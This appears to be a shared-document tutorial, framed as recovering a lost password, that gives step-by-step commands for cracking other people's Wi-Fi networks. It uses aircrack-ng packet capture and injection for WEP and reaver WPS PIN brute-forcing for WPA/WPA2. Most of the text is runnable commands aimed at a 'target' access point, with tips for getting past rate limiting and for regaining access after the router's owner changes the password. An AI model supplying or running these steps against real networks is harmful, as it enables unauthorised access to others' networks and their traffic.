Upload
crt-suznik
View
7
Download
2
Embed Size (px)
DESCRIPTION
require your lost wep or wpa/2 password
Citation preview
Locate your wireless card device name,to do this, open up Terminal, and type the following:'iwconfig' and press enter. You should see your wirelessdevice in the subsequent list. Chances are it will be named'wlan0', but if you have more than one wireless card, or anunusual networking setup, it may be named something different.
Step2:Enable monitor mode on your wireless card,to do this, type the following command:'airmon-ng start wlan0'
Step3:Find the BSSID of the router you would like to crack,To do this, type the following command:'airodump-ng wlan0' (if wlan0 doesn't work, try using mon0 instead.)You will see a list of wireless networks in range, It will look similar tothe following image below:
When you have spotted the network you would like to crack,press Ctrl+C to stop the list from refreshing. Select the BSSIDby Highlighting it, and copy it.
Step4:It's finally time to crack that network,To do this, Type the following command:'reaver -i moninterface -b bssid -vv'Put your monitor interface (wlan0, mon0, or other) where I put 'moninterface',and put your target's BSSID where I typed bssid.eg. 'reaver -i mon0 -b 12:34:56:78:90:10'Press enter, sit back, and let Reaver do it's incredible attack.
- Note, Cracking can take anywhere from 2 hours to a full day, BE PATIENT!
WEP Cracking
What is Aircrack-NG?
Aircrack-ng is an 802.11 WEP and WPA-PSK keys cracking program that can recover keys once enough data packets have been captured. It implements the standard FMS attack along with some optimizations like KoreK attacks, as well as the all-new PTW attack, thus making the attack much faster compared to other WEP cracking tools.In fact, Aircrack-ng is a set of tools for auditing wireless networks.
How do i use this tool?
Simple, just follow my tutorial and you'll be able to crack ALMOST any WEP encrypted password.
These are active attacks, which means that you have to be near the target router in order for this to work. About 50% of signal should be good.
Let's Begin.
Open up a terminal and type:
Quote:airmon-ng
Spoiler(Click to View)
This will show you, your wireless card name. In my case it is called wlan1, but i also have wlan0.
Now, we need to set the wireless card in monitor mode, to do that type:
Quote:airmon-ng start wlan1
Ok, your wireless card is now on monitor mode. If you type airmon-ng again, it'll show you mon0
After that, type:
Quote:airodump-ng mon0
Spoiler(Click to View)
When you press enter, it should show you all the Access Points near you.Copy the BSSID and remember the Channel Number of the target AP.
Press CONTROL+c to cancel. Do this only when you found and copied the info about the target AP.
Spoiler(Click to View)
Now, type:
Quote:airodump-ng -c [channel number] --bssid [bssid] -w wep mon0
Spoiler(Click to View)
You should know start recieving DATA.
Spoiler(Click to View)
To speed up this proccess, open up another terminal and type:
Quote:aireplay-ng -1 0 -a [BSSID] mon0
After it says it was successfull, type:
Quote:aireplay-ng -3 -b [BSSID] mon0
Spoiler(Click to View)
After a some seconds, this should appear:
Spoiler(Click to View)
When you reach 20000 of DATA, which will be really quick if you did what i said above, open another terminal and type:
Quote:aircrack-ng wep-01.cap
Now, wait for some minutes and it should give you the PASSWORD!
The password is:
Quote:EF855844B288E4BB1BA9ADF14D
Spoiler(Click to View)
WPA2-PSK Cracking
Reaver
What is reaver?
Reaver implements a brute force attack against Wifi Protected Setup (WPS) registrar PINs in order to recover WPA/WPA2 passphrases.Reaver has been designed to be a robust and practical attack against WPS, and has been tested against a wide variety of access points and WPS implementations.On average Reaver will recover the target AP's plain text WPA/WPA2 passphrase in 4-10 hours, depending on the AP. In practice, it will generally take half this time to guess the correct WPS pin and recover the passphrase.
How do i use this tool?
As said above, just follow this tutorial :)
NOTE: Reaver doesn't need any Dictionary files!
First, type:
Quote:airmon-ng
As said earlier, this shows you, your wireless card name.
I'll use wlan0
We need to set it the wireless card on monitor mode, so type:
Quote:airmon-ng start wlan0
After that, type:
Quote:airodump-ng mon0
Spoiler(Click to View)
Now, copy the BSSID of the target AP.Press CONTROL+c to cancel
To see the AP's that are vulnerable to WPS attacks, type:
Quote:wash -i mon0
If the target AP is vulnerable, it should say:
Quote:WPS Locked: No
Spoiler(Click to View)
Now, to start the attack, type:
Quote:reaver -i mon0 -b [BSSID] -vv
Spoiler(Click to View)
Now, you'll need to wait around 2-10 hours.
If the AP is limiting you with a message saying:
Quote:[!] WARNING: Detected AP rate limiting, waiting 60 seconds before re-trying
AND
If reaver says that it is trying the same pin, over and over, press CONTROL+c to cancel, then type:
Quote:reaver --help
This will show you the help menu, you can start playing with the options that you have.
I usually add the: -c -S -L
Quote:reaver -i mon0 -c [CHANNEL NUMBER] -b [BSSID] -S -L -vv
This one works great for me, so keep playing with the options untill it works!
When it reaches 100% it should give you some lines, the password is the one after:
Quote:WPS PSK: 'PASSWORD HERE'
And here it is!
You should also, remember the PIN.
Quote:WPS PIN: PIN HERE
Now, let's say for some reason, the router's owner changed the password for his WiFi.
Since you already have the pin, type:
Quote:reaver -i mon0 -c [CHANNEL NUMBER] -b [BSSID] -p [PIN NUMBER] -vv
And it should give you the password in a matter of seconds!